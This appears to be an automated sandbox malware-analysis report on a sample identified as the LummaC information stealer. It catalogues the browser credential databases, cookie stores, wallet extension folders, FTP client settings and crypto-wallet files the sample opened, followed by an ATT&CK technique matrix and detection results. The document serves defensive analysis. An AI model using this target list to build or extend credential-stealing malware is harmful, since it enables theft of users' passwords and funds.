          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7308, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: file.exeString found in binary or memory: s/ElectronCash
          Source: file.exe, 00000000.00000003.1610052449.0000000001547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
          Source: file.exeString found in binary or memory: ExodusWeb3
          Source: file.exe, 00000000.00000003.1521824876.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
          Source: file.exe, 00000000.00000003.1496318044.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe, 00000000.00000003.1496318044.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7308, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7308, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation          		1
          DLL Side-Loading          		2
          Process Injection          		1
          Masquerading          		2
          OS Credential Dumping          		761
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		41
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol41
          Data from Local System          		11
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell          		Logon Script (Windows)2
          Bypass User Account Control          		361
          Virtualization/Sandbox Evasion          		Security Account Manager361
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
          Process Injection          		NTDS1
          File and Directory Discovery          		Distributed Component Object ModelInput Capture124
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets223
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Bypass User Account Control          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe100%AviraTR/Crypt.TPM.Gen
          file.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
